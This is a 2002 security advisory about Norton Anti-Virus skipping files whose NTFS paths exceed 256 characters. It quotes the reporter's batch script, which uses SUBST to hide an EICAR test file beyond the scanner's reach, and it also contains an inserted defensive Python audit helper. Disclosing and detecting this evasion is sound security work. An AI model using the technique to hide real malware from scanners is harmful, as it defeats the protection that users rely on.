SecurityTracker.com
SecurityTracker Archives

Category: Application (Security) > Norton Anti-Virus
Vendors: Symantec
Symantec's Norton Anti-Virus Fails to Scan Files With Certain Types of Long NTFS File Path Names
Date: Jan 31 2002
Impact: Modification of system information
Exploit Included: Yes
Version(s): 5.0, 7.5.1, and 8.00.58
Description:  A vulnerability was reported in Norton Anti-Virus (and potentially other virus scanning products). A local user or a virus may create a file with an NTFS file path name that cannot be scanned by the anti-virus engine.

It is reported that a file with a file path name containing more than 256 characters will not be scanned by the anti-virus scanner.

It is reported that a long folder path can be substituted with a short drive letter using the "SUBST" command. A local user can change the current drive to the substituted drive, which resets the effective path length to 3 characters (e.g., Q:\). This can apparently be repeated so that a file with a very long path appears to have a short path. It is reported that the anti-virus scanner cannot follow the deep path.

A demonstration exploit batch script is provided in the Source Message.
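
The defensive counterpart to the technique described above is an audit that measures each file's path at its true length, with any SUBST drive letters expanded, and reports the files an older scanner walking from the drive root would never reach. The Python below is an added example, not code from the SecurityTracker entry, from Symantec, or from the reporter. It assumes the `subst` command prints mappings as `Q:\: => C:\target`, takes the 256-character figure from this advisory, and its SUBST table and file list are constructed to match the directory depth the reporter's batch script uses.

```python
"""Audit helper (added example): find files whose real path, after expanding
SUBST drive substitutions, is longer than the limit an older scanner stops at.

Not part of the SecurityTracker entry, Symantec's product, or the reporter's
script. Assumptions: `subst` prints lines of the form "Q:\\: => C:\\target";
the 256-character figure is the one the advisory reports; all sample data
below is constructed.
"""
import ntpath
import os

LEGACY_LIMIT = 256  # path length the advisory says the scanner will not exceed

# Constructed: the same 19 x "1234567890" + "123456789" depth as the reporter's
# batch script, so the base path alone is 226 characters, under the limit.
DEEP = "c:\\temp" + "\\1234567890" * 19 + "\\123456789"
SAMPLE_SUBST = {"Q:": DEEP}
SAMPLE_PATHS = [
    "C:\\Windows\\notepad.exe",                              # ordinary file
    DEEP + "\\EICAR1.COM",                                   # 237 chars: reachable
    "Q:\\1234567890\\1234567890\\1234567890\\EICAR2.COM",    # looks short, is 270
]


def parse_subst_output(text):
    """Build {'Q:': target} from the text `subst` prints (assumed "Q:\\: => target")."""
    mapping = {}
    for line in text.splitlines():
        if " => " not in line:
            continue
        left, right = line.split(" => ", 1)
        mapping[left.strip()[:2].upper()] = right.strip()
    return mapping


def resolve_subst(path, subst_map):
    """Expand a SUBST drive letter to its underlying folder, repeatedly, so a
    short-looking path such as Q:\\a\\b is measured at its true length.
    Raises ValueError on a substitution loop (Q: -> R: -> Q:)."""
    seen = set()
    drive, rest = ntpath.splitdrive(path)
    while drive.upper() in subst_map:
        if drive.upper() in seen:
            raise ValueError(f"SUBST loop through {drive}")
        seen.add(drive.upper())
        path = ntpath.join(subst_map[drive.upper()], rest.lstrip("\\"))
        drive, rest = ntpath.splitdrive(path)
    return path


def audit(paths, subst_map, limit=LEGACY_LIMIT):
    """Return [(resolved_path, length)] for files whose true path exceeds limit;
    these are the ones a scanner walking from the drive root would never reach."""
    hits = []
    for p in paths:
        real = resolve_subst(p, subst_map)
        if len(real) > limit:
            hits.append((real, len(real)))
    return hits


def walk_extended(root):
    """Enumerate files under root with the \\\\?\\ extended-length prefix, so the
    walk itself is not cut off at the legacy limit. Windows only; yields nothing
    elsewhere. Feed the result to audit() together with parse_subst_output()."""
    if os.name != "nt":
        return
    ext_root = root if root.startswith("\\\\?\\") else "\\\\?\\" + ntpath.abspath(root)
    for dirpath, _dirs, files in os.walk(ext_root):
        for name in files:
            yield ntpath.join(dirpath, name)


if __name__ == "__main__":
    for real, n in audit(SAMPLE_PATHS, SAMPLE_SUBST):
        print(f"{n} chars, beyond the {LEGACY_LIMIT} limit: {real}")
```

Run against the constructed sample, only the file created through the Q: drive is reported: its visible path is 45 characters, but expanded through the substitution it is 270, past the limit, while the EICAR1.COM file at the base of the deep tree (237 characters) is still reachable. On a live host the same audit is fed from `walk_extended()` and from the parsed `subst` output, and it keeps working after the substituted drive has been deleted, which is exactly the case in which the scanner in the advisory loses the file.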

Impact: A local user (or virus code) can create a file with a particular type of file path name that will not be scanned by the anti-virus scanning engine.
Solution: No solution was available at the time of this entry.
Vendor URL: enterprisesecurity.symantec.com/content/productlink.cfm?PID=na&EID=0
Cause: Exception handling error
Underlying OS: Windows (NT), Windows (2000), Windows (XP)
Underlying OS Comments: Tested on Windows NT 4.0 SP4 and SP6a, Windows 2000 Professional SP2, and Windows XP Pro
Reported By: hans.somers@nl.abnamro.com
Message History: None.


Source Message Contents

Date: Wed, 30 Jan 2002 09:33:33 +0100
From: hans.somers@nl.abnamro.com
Subject: Long path exploit on NTFS

> Long path exploit on NTFS
> =====================
> The filesystem NTFS seems to be a hiding place for viruses if you use a file path which exceeds 256 characters.
>
> What is the case?
> The file path (drive + folder path + filename) theoretically can take up to 32000 characters if the filesystem in use is NTFS. However, in the way in which Windows NT (4.0, 2000 and XP) accesses this filesystem, a maximum of 256 characters is in place. If you try to go deeper, you will experience a "Path too long" error.
> In these operating systems there is a way to substitute a long folder path, using the "SUBST" command. If you change your current drive to the substituted drive, the path length is reset to 3 (Q:\ e.g.) and Windows NT allows you to create an even deeper path.
> Normally this would not alarm anyone; however, I discovered that my favorite virus scanner (Norton AntiVirus) was not able to follow the deep path where I created the EICAR test string. So I created a very simple batch file to demonstrate this exploit.
> My virus scanner will only find this virus if the SUBST drive is available during the scan.
>
> I have tested this on the following platforms:
> Windows NT 4.0 SP4
> Windows NT 4.0 SP6a
> Windows 2000 Professional SP2
> Windows XP Pro
> I have determined that the following versions of Norton AntiVirus will not follow the deep path during a complete scan:
> Norton AntiVirus 5.0
> Norton AntiVirus 7.5.1
> Norton AntiVirus 8.00.58
>
> I suspect that other virus scanners will encounter the same "bug", so you might try the sample script that I created. Additionally, other tools (quota managers, inventory tools etc.) that gather information from an NTFS partition might reveal the same bug.
>
> After running the script below, remove the substituted drive (SUBST Q: /D) and run a full scan on your C: partition. I suspect that the EICAR virus will not be found.
> Additionally, re-create the substituted drive and re-run the scan. Under normal conditions the EICAR virus will be found and removed (depending on your settings).
>
> As far as I can see, there is no real remedy against this exploit. I hope this message will pass through the proper channels, so the responsible parties will act on this.
>
> Responses on this posting at my address are welcome.
>
> Hans Somers (hans.somers@nl.abnamro.com)
 
> Sample script:
> ===========
> @echo off
> cls
> echo Start test-script NTFS-limit
> @echo Create a filepath to the limit of NTFS
> md c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
> cd c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
> @echo Create the Eicar test-string for PoC. This should be detected normally if you have an active virusscanner.
> echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >EICAR.TXT
> echo. >>EICAR.TXT
> @echo Activate the Eicar test-string
> copy EICAR.TXT EICAR1.COM >NUL
> @echo Create a subst-drive Q: for this path
> subst Q: c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
> @echo Create an even deeper filepath (thus exceeding the limit of NTFS's explorer)
> md Q:\1234567890\1234567890\1234567890
> @echo Change current folder into "the deep"
> Q:
> cd Q:\1234567890\1234567890\1234567890
> @echo Create the Eicar test-string
> echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >EICAR.TXT
> echo. >>EICAR.TXT
> @echo Activate the Eicar test-string
> copy EICAR.TXT EICAR2.COM >NUL
> EICAR2.COM
> echo .
> echo End of test-script


Copyright 2002, SecurityGlobal.net LLC